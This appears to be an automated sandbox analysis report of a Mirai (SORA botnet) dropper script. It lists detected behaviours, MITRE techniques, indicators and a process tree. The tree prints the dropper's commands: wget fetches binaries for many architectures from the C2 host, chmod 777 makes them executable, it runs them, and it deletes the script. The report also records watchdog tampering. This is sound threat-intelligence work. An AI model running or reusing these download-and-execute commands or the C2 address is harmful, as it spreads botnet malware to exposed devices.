mirai | hxxp://cnc[.]visionproxy[.]cc/wget[.]sh

Analysis

max time kernel
49s
max time network
53s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
28/03/2025, 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://cnc.visionproxy.cc/wget.sh

Score

10^/10

mirai sora antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (14200) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1924	chmod
1928	chmod
1932	chmod
1936	chmod
1944	chmod
1948	chmod
1952	chmod
1956	chmod
1940	chmod
1960	chmod
1964	chmod
1968	chmod
1984	chmod

Executes dropped EXE 12 IoCs

ioc	pid	Process
/root/Downloads/wget.sh	1926	bash
/root/Downloads/arm	1929	wget.sh
/root/Downloads/arm5	1933	wget.sh
/root/Downloads/arm6	1937	wget.sh
/root/Downloads/arm7	1941	wget.sh
/root/Downloads/m68k	1945	wget.sh
/root/Downloads/mips	1949	wget.sh
/root/Downloads/mpsl	1953	wget.sh
/root/Downloads/ppc	1957	wget.sh
/root/Downloads/sh4	1961	wget.sh
/root/Downloads/spc	1965	wget.sh
/root/Downloads/x86	1969	wget.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	wget.sh
File opened for modification	/dev/misc/watchdog	wget.sh

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Enumerates running processes
Discovers information about currently running processes on the system

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-17.dat	upx
behavioral1/files/fstream-18.dat	upx
behavioral1/files/fstream-19.dat	upx
behavioral1/files/fstream-20.dat	upx
behavioral1/files/fstream-21.dat	upx
behavioral1/files/fstream-22.dat	upx
behavioral1/files/fstream-23.dat	upx
behavioral1/files/fstream-24.dat	upx
behavioral1/files/fstream-27.dat	upx
behavioral1/files/fstream-28.dat	upx
behavioral1/files/fstream-29.dat	upx
behavioral1/files/fstream-30.dat	upx
behavioral1/files/fstream-31.dat	upx
behavioral1/files/fstream-32.dat	upx
behavioral1/files/fstream-37.dat	upx
behavioral1/files/fstream-38.dat	upx

Changes its process name 64 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	glean.dispatche	1618	firefox
Changes the process name, possibly in an attempt to hide itself	IPC I/O Parent	1619	firefox
Changes the process name, possibly in an attempt to hide itself	IPC I/O Parent	1619	firefox
Changes the process name, possibly in an attempt to hide itself	IPC I/O Parent	1619	firefox
Changes the process name, possibly in an attempt to hide itself	HTML5 Parser	1625	firefox
Changes the process name, possibly in an attempt to hide itself	HTML5 Parser	1625	firefox
Changes the process name, possibly in an attempt to hide itself	Backgro~Pool #1	1624	firefox
Changes the process name, possibly in an attempt to hide itself	Backgro~Pool #1	1624	firefox
Changes the process name, possibly in an attempt to hide itself	IPDL Background	1623	firefox
Changes the process name, possibly in an attempt to hide itself	IPDL Background	1623	firefox
Changes the process name, possibly in an attempt to hide itself	Socket Thread	1622	firefox
Changes the process name, possibly in an attempt to hide itself	Socket Thread	1622	firefox
Changes the process name, possibly in an attempt to hide itself	Netlink Monitor	1621	firefox
Changes the process name, possibly in an attempt to hide itself	Netlink Monitor	1621	firefox
Changes the process name, possibly in an attempt to hide itself	Timer	1620	firefox
Changes the process name, possibly in an attempt to hide itself	Timer	1620	firefox
Changes the process name, possibly in an attempt to hide itself	JS Watchdog	1627	firefox
Changes the process name, possibly in an attempt to hide itself	JS Watchdog	1627	firefox
Changes the process name, possibly in an attempt to hide itself	BGReadURLs	1629	firefox
Changes the process name, possibly in an attempt to hide itself	BGReadURLs	1629	firefox
Changes the process name, possibly in an attempt to hide itself	Cache2 I/O	1630	firefox
Changes the process name, possibly in an attempt to hide itself	Cookie	1631	firefox
Changes the process name, possibly in an attempt to hide itself	Cookie	1631	firefox
Changes the process name, possibly in an attempt to hide itself	TaskCon~ller #1	1634	firefox
Changes the process name, possibly in an attempt to hide itself	TaskCon~ller #0	1633	firefox
Changes the process name, possibly in an attempt to hide itself	StreamTrans #1	1632	firefox
Changes the process name, possibly in an attempt to hide itself	StreamTrans #1	1632	firefox
Changes the process name, possibly in an attempt to hide itself	BgIOThr~Pool #1	1635	firefox
Changes the process name, possibly in an attempt to hide itself	BgIOThr~Pool #1	1635	firefox
Changes the process name, possibly in an attempt to hide itself	Worker Launcher	1636	firefox
Changes the process name, possibly in an attempt to hide itself	Worker Launcher	1636	firefox
Changes the process name, possibly in an attempt to hide itself	gmain	1637	firefox
Changes the process name, possibly in an attempt to hide itself	gdbus	1639	firefox
Changes the process name, possibly in an attempt to hide itself	gmain	1642	xdg-desktop-portal
Changes the process name, possibly in an attempt to hide itself	gdbus	1643	xdg-desktop-portal
Changes the process name, possibly in an attempt to hide itself	pool	1644	xdg-desktop-portal
Changes the process name, possibly in an attempt to hide itself	gdbus	1648	xdg-document-portal
Changes the process name, possibly in an attempt to hide itself	gmain	1647	xdg-document-portal
Changes the process name, possibly in an attempt to hide itself	pool	1652	xdg-permission-store
Changes the process name, possibly in an attempt to hide itself	gmain	1651	xdg-permission-store
Changes the process name, possibly in an attempt to hide itself	gdbus	1653	xdg-permission-store
Changes the process name, possibly in an attempt to hide itself	pool	1654	xdg-document-portal
Changes the process name, possibly in an attempt to hide itself	fuse mainloop	1656	xdg-document-portal
Changes the process name, possibly in an attempt to hide itself	dconf worker	1659	xdg-desktop-portal
Changes the process name, possibly in an attempt to hide itself	gdbus	1663	xdg-desktop-portal-gtk
Changes the process name, possibly in an attempt to hide itself	gmain	1662	xdg-desktop-portal-gtk
Changes the process name, possibly in an attempt to hide itself	gdbus	1667	gvfsd
Changes the process name, possibly in an attempt to hide itself	gmain	1666	gvfsd
Changes the process name, possibly in an attempt to hide itself	pool	1668	gvfsd
Changes the process name, possibly in an attempt to hide itself	gmain	1674	gvfsd-fuse
Changes the process name, possibly in an attempt to hide itself	gdbus	1675	gvfsd-fuse
Changes the process name, possibly in an attempt to hide itself	gvfs-fuse-sub	1676	gvfsd-fuse
Changes the process name, possibly in an attempt to hide itself	pool	1677	xdg-desktop-portal-gtk
Changes the process name, possibly in an attempt to hide itself	pool	1680	xdg-desktop-portal-gtk
Changes the process name, possibly in an attempt to hide itself	pool	1679	xdg-desktop-portal-gtk
Changes the process name, possibly in an attempt to hide itself	pool	1678	xdg-desktop-portal-gtk
Changes the process name, possibly in an attempt to hide itself	Softwar~cThread	1681	firefox
Changes the process name, possibly in an attempt to hide itself	Softwar~cThread	1681	firefox
Changes the process name, possibly in an attempt to hide itself	Softwar~cThread	1681	firefox
Changes the process name, possibly in an attempt to hide itself	Compositor	1686	firefox
Changes the process name, possibly in an attempt to hide itself	Compositor	1686	firefox
Changes the process name, possibly in an attempt to hide itself	WRWorkerLP#0	1685	firefox
Changes the process name, possibly in an attempt to hide itself	WRWorker#0	1684	firefox
Changes the process name, possibly in an attempt to hide itself	Renderer	1683	firefox

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	firefox

Reads CPU attributes 1 TTPs 11 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/present	firefox
File opened for reading	/sys/devices/system/cpu/online	firefox
File opened for reading	/sys/devices/system/cpu/present	firefox
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	firefox
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	firefox
File opened for reading	/sys/devices/system/cpu/present	firefox
File opened for reading	/sys/devices/system/cpu/present	firefox
File opened for reading	/sys/devices/system/cpu/present	firefox
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	firefox
File opened for reading	/sys/devices/system/cpu/present	firefox
File opened for reading	/sys/devices/system/cpu/present	firefox

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/bus/pci/devices/0000:00:01.0/resource	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.3/irq	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:02.0/vendor	firefox
File opened for reading	/sys/bus/usb/devices	gvfs-gphoto2-volume-monitor
File opened for reading	/sys/bus/pci/devices/0000:00:03.0/resource	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:03.0/device	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:05.0/irq	firefox
File opened for reading	/sys/devices/pci0000:00/0000:00:02.0/uevent	firefox
File opened for reading	/sys/bus/pci/devices	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.0/irq	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:04.0/resource	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:04.0/irq	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.1/vendor	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.1/device	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:06.0/resource	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:04.0/class	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:00.0/device	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:06.0/irq	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:02.0/device	firefox
File opened for reading	/sys/class	gvfs-mtp-volume-monitor
File opened for reading	/sys/bus/pci/devices/0000:00:00.0/resource	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:00.0/vendor	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:03.0/irq	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:06.0/vendor	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:05.0/device	firefox
File opened for reading	/sys/bus/usb/devices	gvfs-mtp-volume-monitor
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent	gvfs-mtp-volume-monitor
File opened for reading	/sys/devices/pci0000:00/0000:00:02.0/device	firefox
File opened for reading	/sys/devices/system/cpu	firefox
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/usb1/uevent	gvfs-gphoto2-volume-monitor
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent	gvfs-gphoto2-volume-monitor
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/usb1/uevent	gvfs-mtp-volume-monitor
File opened for reading	/sys/bus/pci/devices/0000:00:00.0/class	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.1/resource	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:02.0/resource	firefox
File opened for reading	/sys/devices/pci0000:00/0000:00:02.0/subsystem_vendor	firefox
File opened for reading	/sys/devices/pci0000:00/0000:00:02.0/subsystem_device	firefox
File opened for reading	/sys/kernel/security/apparmor/features/dbus/mask	dbus-daemon
File opened for reading	/sys/bus/pci/devices/0000:00:01.0/vendor	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.0/class	firefox
File opened for reading	/sys/devices/system/cpu	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:04.0/device	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:06.0/class	firefox
File opened for reading	/sys/bus	gvfs-gphoto2-volume-monitor
File opened for reading	/sys/class	gvfs-gphoto2-volume-monitor
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/uevent	gvfs-mtp-volume-monitor
File opened for reading	/sys/bus/pci/devices/0000:00:03.0/class	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:02.0/class	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:05.0/vendor	firefox
File opened for reading	/sys/devices/system/cpu	firefox
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent	gvfs-mtp-volume-monitor
File opened for reading	/sys/bus/pci/devices/0000:00:04.0/vendor	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.3/class	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:05.0/class	firefox
File opened for reading	/sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us	firefox
File opened for reading	/sys/devices/system/cpu	firefox
File opened for reading	/sys/devices/system/cpu	firefox
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent	gvfs-gphoto2-volume-monitor
File opened for reading	/sys/bus/pci/devices/0000:00:01.0/device	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:00.0/irq	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.3/resource	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.3/device	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:01.1/class	firefox
File opened for reading	/sys/bus/pci/devices/0000:00:06.0/device	firefox

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1850/cmdline	dbus-daemon
File opened for reading	/proc/1/cmdline	wget.sh
File opened for reading	/proc/976/cmdline	wget.sh
File opened for reading	/proc/1296/cmdline	wget.sh
File opened for reading	/proc/1860/cmdline	dbus-daemon
File opened for reading	/proc/558/net/tcp	wget.sh
File opened for reading	/proc/1163/net/tcp	wget.sh
File opened for reading	/proc/1786/net/tcp	wget.sh
File opened for reading	/proc/28/cmdline	wget.sh
File opened for reading	/proc/171/cmdline	wget.sh
File opened for reading	/proc/1258/cmdline	wget.sh
File opened for reading	/proc/1864/cmdline	wget.sh
File opened for reading	/proc/self/task/1793/stat	firefox
File opened for reading	/proc/1495/net/tcp	wget.sh
File opened for reading	/proc/9/cmdline	wget.sh
File opened for reading	/proc/1160/cmdline	wget.sh
File opened for reading	/proc/1609/cmdline	wget.sh
File opened for reading	/proc/self/fd	dbus-send
File opened for reading	/proc/self/fd	gvfsd
File opened for reading	/proc/964/net/tcp	wget.sh
File opened for reading	/proc/22/cmdline	wget.sh
File opened for reading	/proc/166/cmdline	wget.sh
File opened for reading	/proc/719/net/tcp	wget.sh
File opened for reading	/proc/26/cmdline	wget.sh
File opened for reading	/proc/1142/cmdline	wget.sh
File opened for reading	/proc/1752/cmdline	wget.sh
File opened for reading	/proc/self/fd/77	firefox
File opened for reading	/proc/self/fd/79	firefox
File opened for reading	/proc/452/net/tcp	wget.sh
File opened for reading	/proc/3/cmdline	wget.sh
File opened for reading	/proc/89/cmdline	wget.sh
File opened for reading	/proc/self/fd/33	firefox
File opened for reading	/proc/self/fd/74	firefox
File opened for reading	/proc/1782/net/tcp	wget.sh
File opened for reading	/proc/733/cmdline	wget.sh
File opened for reading	/proc/1837/cmdline	wget.sh
File opened for reading	/proc/self/task/1698/stat	firefox
File opened for reading	/proc/17/cmdline	wget.sh
File opened for reading	/proc/1199/cmdline	wget.sh
File opened for reading	/proc/self/fd/72	firefox
File opened for reading	/proc/1665/net/tcp	wget.sh
File opened for reading	/proc/587/cmdline	wget.sh
File opened for reading	/proc/1077/cmdline	wget.sh
File opened for reading	/proc/1146/cmdline	wget.sh
File opened for reading	/proc/1899/cmdline	dbus-daemon
File opened for reading	/proc/956/net/tcp	wget.sh
File opened for reading	/proc/27/cmdline	wget.sh
File opened for reading	/proc/1101/cmdline	wget.sh
File opened for reading	/proc/1286/cmdline	wget.sh
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/167/cmdline	wget.sh
File opened for reading	/proc/1159/cmdline	wget.sh
File opened for reading	/proc/1525/cmdline	dbus-daemon
File opened for reading	/proc/self/fd/31	firefox
File opened for reading	/proc/self/stat	firefox
File opened for reading	/proc/1146/net/tcp	wget.sh
File opened for reading	/proc/14/cmdline	wget.sh
File opened for reading	/proc/23/cmdline	wget.sh
File opened for reading	/proc/1097/net/tcp	wget.sh
File opened for reading	/proc/78/cmdline	wget.sh
File opened for reading	/proc/1519/cmdline	wget.sh
File opened for reading	/proc/1884/cmdline	wget.sh
File opened for reading	/proc/filesystems	gvfsd
File opened for reading	/proc/self/fd/69	firefox

System Information Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the system, such as OS, hostname, and hardware details.

discovery

System Information Discovery

T1082

pid	Process
1628	lsb_release

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1910	lesspipe
1911	basename
1913	dirname
1947	wget
1949	mips

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/firefox/.parentlock	firefox
File opened for modification	/tmp/C_U-HRtB.sh	firefox
File opened for modification	/tmp/LYDWgDeP.sh	firefox
File opened for modification	/tmp/tmpaddon	firefox
File opened for modification	/tmp/tmpaddon-1	firefox

/usr/bin/xdg-open
xdg-open http://cnc.visionproxy.cc/wget.sh
1⤵
PID:1524
- /usr/bin/dbus-send
  dbus-send --print-reply "--dest=org.freedesktop.DBus" /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager
  2⤵
  - Reads runtime system information
  PID:1525
- - /usr/bin/dbus-launch
    dbus-launch --autolaunch 11c67417355f45d397f6be11f62e85a6 --binary-syntax --close-stderr
    3⤵
    PID:1526
  - - /usr/bin/dbus-daemon
      /usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session
      4⤵
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:1528
    - - /usr/libexec/xdg-desktop-portal
        
        /usr/libexec/xdg-desktop-portal
        5⤵
        Changes its process name
        
        PID:1641
    - - /usr/libexec/xdg-document-portal
        
        /usr/libexec/xdg-document-portal
        5⤵
        Changes its process name
        
        PID:1646
    - - /usr/libexec/xdg-permission-store
        
        /usr/libexec/xdg-permission-store
        5⤵
        Changes its process name
        
        PID:1650
    - - /usr/libexec/xdg-desktop-portal-gtk
        
        /usr/libexec/xdg-desktop-portal-gtk
        5⤵
        Changes its process name
        
        PID:1661
    - - /usr/lib/gvfs/gvfsd
        
        /usr/lib/gvfs/gvfsd
        5⤵
        Changes its process name
        Reads runtime system information
        
        PID:1665
      - /usr/lib/gvfs/gvfsd-trash
        
        /usr/lib/gvfs/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0
        6⤵
        
        PID:1840
    - - /usr/bin/nautilus
        
        /usr/bin/nautilus --gapplication-service
        5⤵
        
        PID:1837
    - - /usr/lib/gvfs/gvfs-udisks2-volume-monitor
        
        /usr/lib/gvfs/gvfs-udisks2-volume-monitor
        5⤵
        
        PID:1850
    - - /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
        
        /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
        5⤵
        Enumerates kernel/hardware configuration
        
        PID:1855
    - - /usr/lib/gvfs/gvfs-goa-volume-monitor
        
        /usr/lib/gvfs/gvfs-goa-volume-monitor
        5⤵
        
        PID:1860
    - - /usr/lib/gnome-online-accounts/goa-daemon
        
        /usr/lib/gnome-online-accounts/goa-daemon
        5⤵
        
        PID:1864
    - - /usr/lib/gnome-online-accounts/goa-identity-service
        
        /usr/lib/gnome-online-accounts/goa-identity-service
        5⤵
        
        PID:1873
    - - /usr/lib/gvfs/gvfs-mtp-volume-monitor
        
        /usr/lib/gvfs/gvfs-mtp-volume-monitor
        5⤵
        Enumerates kernel/hardware configuration
        
        PID:1875
    - - /usr/lib/gvfs/gvfs-afc-volume-monitor
        
        /usr/lib/gvfs/gvfs-afc-volume-monitor
        5⤵
        
        PID:1884
    - - /usr/lib/dconf/dconf-service
        
        /usr/lib/dconf/dconf-service
        5⤵
        
        PID:1890
    - - /usr/lib/gnome-terminal/gnome-terminal-server
        
        /usr/lib/gnome-terminal/gnome-terminal-server
        5⤵
        
        PID:1899
      - /bin/bash
        
        bash
        6⤵
        Executes dropped EXE
        
        PID:1906
        
        /usr/bin/groups
        
        groups
        7⤵
        
        PID:1908
        
        /usr/bin/lesspipe
        
        lesspipe
        7⤵
        System Network Configuration Discovery
        
        PID:1910
        
        /usr/bin/basename
        
        basename /usr/bin/lesspipe
        8⤵
        System Network Configuration Discovery
        
        PID:1911
        
        /usr/bin/dirname
        
        dirname /usr/bin/lesspipe
        8⤵
        System Network Configuration Discovery
        
        PID:1913
        
        /usr/bin/dircolors
        
        dircolors -b
        7⤵
        
        PID:1915
        
        /bin/chmod
        
        chmod 777 "wget(1).sh" wget.sh
        7⤵
        File and Directory Permissions Modification
        
        PID:1924
        
        /root/Downloads/wget
        
        ./wget
        7⤵
        
        PID:1925
        
        /root/Downloads/wget.sh
        
        ./wget.sh
        7⤵
        Executes dropped EXE
        Modifies Watchdog functionality
        Reads runtime system information
        
        PID:1926
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/arm
        8⤵
        
        PID:1927
        
        /bin/chmod
        
        chmod 777 arm
        8⤵
        File and Directory Permissions Modification
        
        PID:1928
        
        /root/Downloads/arm
        
        ./arm multi.arm
        8⤵
        
        PID:1929
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/arm5
        8⤵
        
        PID:1931
        
        /bin/chmod
        
        chmod 777 arm5
        8⤵
        File and Directory Permissions Modification
        
        PID:1932
        
        /root/Downloads/arm5
        
        ./arm5 multi.arm5
        8⤵
        
        PID:1933
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/arm6
        8⤵
        
        PID:1935
        
        /bin/chmod
        
        chmod 777 arm6
        8⤵
        File and Directory Permissions Modification
        
        PID:1936
        
        /root/Downloads/arm6
        
        ./arm6 multi.arm6
        8⤵
        
        PID:1937
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/arm7
        8⤵
        
        PID:1939
        
        /bin/chmod
        
        chmod 777 arm7
        8⤵
        File and Directory Permissions Modification
        
        PID:1940
        
        /root/Downloads/arm7
        
        ./arm7 multi.arm7
        8⤵
        
        PID:1941
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/m68k
        8⤵
        
        PID:1943
        
        /bin/chmod
        
        chmod 777 m68k
        8⤵
        File and Directory Permissions Modification
        
        PID:1944
        
        /root/Downloads/m68k
        
        ./m68k multi.m68k
        8⤵
        
        PID:1945
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/mips
        8⤵
        System Network Configuration Discovery
        
        PID:1947
        
        /bin/chmod
        
        chmod 777 mips
        8⤵
        File and Directory Permissions Modification
        
        PID:1948
        
        /root/Downloads/mips
        
        ./mips multi.mips
        8⤵
        System Network Configuration Discovery
        
        PID:1949
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/mpsl
        8⤵
        
        PID:1951
        
        /bin/chmod
        
        chmod 777 mpsl
        8⤵
        File and Directory Permissions Modification
        
        PID:1952
        
        /root/Downloads/mpsl
        
        ./mpsl multi.mpsl
        8⤵
        
        PID:1953
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/ppc
        8⤵
        
        PID:1955
        
        /bin/chmod
        
        chmod 777 ppc
        8⤵
        File and Directory Permissions Modification
        
        PID:1956
        
        /root/Downloads/ppc
        
        ./ppc multi.ppc
        8⤵
        
        PID:1957
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/sh4
        8⤵
        
        PID:1959
        
        /bin/chmod
        
        chmod 777 sh4
        8⤵
        File and Directory Permissions Modification
        
        PID:1960
        
        /root/Downloads/sh4
        
        ./sh4 multi.sh4
        8⤵
        
        PID:1961
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/spc
        8⤵
        
        PID:1963
        
        /bin/chmod
        
        chmod 777 spc
        8⤵
        File and Directory Permissions Modification
        
        PID:1964
        
        /root/Downloads/spc
        
        ./spc multi.spc
        8⤵
        
        PID:1965
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/x86
        8⤵
        
        PID:1967
        
        /bin/chmod
        
        chmod 777 x86
        8⤵
        File and Directory Permissions Modification
        
        PID:1968
        
        /usr/bin/wget
        
        wget http://cnc.visionproxy.cc/x86_64
        8⤵
        
        PID:1973
        
        /bin/chmod
        
        chmod 777 x86_64
        8⤵
        File and Directory Permissions Modification
        
        PID:1984
        
        /root/Downloads/x86_64
        
        ./x86_64 multi.x86_64
        8⤵
        
        PID:1985
        
        /bin/rm
        
        rm ./wget.sh
        8⤵
        
        PID:1986
- /bin/grep
  grep " = \\\"xfce4\\\"\$"
  2⤵
  PID:1532
- /usr/bin/xprop
  xprop -root _DT_SAVE_MODE
  2⤵
  PID:1531
- /bin/grep
  grep -i "^xfce_desktop_window"
  2⤵
  PID:1534
- /usr/bin/xprop
  xprop -root
  2⤵
  PID:1533
- /bin/grep
  grep -q "^Enlightenment"
  2⤵
  PID:1536
- /bin/uname
  uname
  2⤵
  PID:1537
- /bin/grep
  grep -q "^file://"
  2⤵
  PID:1539
- /bin/egrep
  egrep -q "^[[:alpha:]+\\.\\-]+:"
  2⤵
  PID:1541
- /usr/local/sbin/grep
  grep -E -q "^[[:alpha:]+\\.\\-]+:"
  2⤵
  PID:1541
- /usr/local/bin/grep
  grep -E -q "^[[:alpha:]+\\.\\-]+:"
  2⤵
  PID:1541
- /usr/sbin/grep
  grep -E -q "^[[:alpha:]+\\.\\-]+:"
  2⤵
  PID:1541
- /usr/bin/grep
  grep -E -q "^[[:alpha:]+\\.\\-]+:"
  2⤵
  PID:1541
- /sbin/grep
  grep -E -q "^[[:alpha:]+\\.\\-]+:"
  2⤵
  PID:1541
- /bin/grep
  grep -E -q "^[[:alpha:]+\\.\\-]+:"
  2⤵
  PID:1541
- /bin/sed
  sed -n "s/\$^[[:alnum:]+\\.-]*\$:.*\$/\\1/p"
  2⤵
  PID:1544
- /usr/bin/xdg-mime
  xdg-mime query default x-scheme-handler/http
  2⤵
  PID:1545
- - /usr/bin/dbus-send
    dbus-send --print-reply "--dest=org.freedesktop.DBus" /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager
    3⤵
    PID:1546
  - - /usr/bin/dbus-launch
      dbus-launch --autolaunch 11c67417355f45d397f6be11f62e85a6 --binary-syntax --close-stderr
      4⤵
      PID:1547
- - /bin/grep
    grep " = \\\"xfce4\\\"\$"
    3⤵
    PID:1549
- - /usr/bin/xprop
    xprop -root _DT_SAVE_MODE
    3⤵
    PID:1548
- - /bin/grep
    grep -i "^xfce_desktop_window"
    3⤵
    PID:1551
- - /usr/bin/xprop
    xprop -root
    3⤵
    PID:1550
- - /bin/grep
    grep -q "^Enlightenment"
    3⤵
    PID:1553
- - /bin/uname
    uname
    3⤵
    PID:1554
- - /bin/sed
    sed "s/:/ /g"
    3⤵
    - Reads runtime system information
    PID:1557
- - /usr/bin/cut
    cut -d ";" -f 1
    3⤵
    PID:1562
- - /usr/bin/cut
    cut -d "=" -f 2
    3⤵
    PID:1561
- - /bin/grep
    grep "x-scheme-handler/http=" /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache
    3⤵
    PID:1559
- - /usr/bin/head
    head -n 1
    3⤵
    PID:1560
- - /usr/bin/cut
    cut -d ";" -f 1
    3⤵
    PID:1567
- - /usr/bin/cut
    cut -d "=" -f 2
    3⤵
    PID:1566
- - /usr/bin/head
    head -n 1
    3⤵
    PID:1565
- - /bin/grep
    grep "x-scheme-handler/http=" /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache
    3⤵
    PID:1564
- - /usr/bin/cut
    cut -d ";" -f 1
    3⤵
    PID:1572
- - /usr/bin/cut
    cut -d "=" -f 2
    3⤵
    PID:1571
- - /usr/bin/head
    head -n 1
    3⤵
    PID:1570
- - /bin/grep
    grep "x-scheme-handler/http=" /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache
    3⤵
    PID:1569
- - /usr/bin/cut
    cut -d ";" -f 1
    3⤵
    PID:1577
- - /usr/bin/cut
    cut -d "=" -f 2
    3⤵
    PID:1576
- - /usr/bin/head
    head -n 1
    3⤵
    PID:1575
- - /bin/grep
    grep "x-scheme-handler/http=" /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache
    3⤵
    PID:1574
- - /usr/bin/cut
    cut -d ";" -f 1
    3⤵
    PID:1582
- - /usr/bin/cut
    cut -d "=" -f 2
    3⤵
    PID:1581
- - /usr/bin/head
    head -n 1
    3⤵
    PID:1580
- - /bin/grep
    grep "x-scheme-handler/http=" /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache
    3⤵
    PID:1579
- /bin/sed
  sed "s/:/ /g"
  2⤵
  PID:1585
- /bin/sed
  sed -e "s|-|/|"
  2⤵
  PID:1588
- /bin/sed
  sed -e "s|-|/|"
  2⤵
  PID:1591
- /usr/bin/cut
  cut "-d=" -f 2-
  2⤵
  PID:1596
- /usr/bin/which
  which firefox
  2⤵
  PID:1597
- /usr/bin/cut
  cut "-d=" -f 2-
  2⤵
  PID:1600
- /usr/bin/cut
  cut "-d=" -f 2-
  2⤵
  PID:1603
- /usr/bin/cut
  cut "-d=" -f 2-
  2⤵
  PID:1608
- /usr/bin/firefox
  /usr/bin/firefox http://cnc.visionproxy.cc/wget.sh
  2⤵
  PID:1609
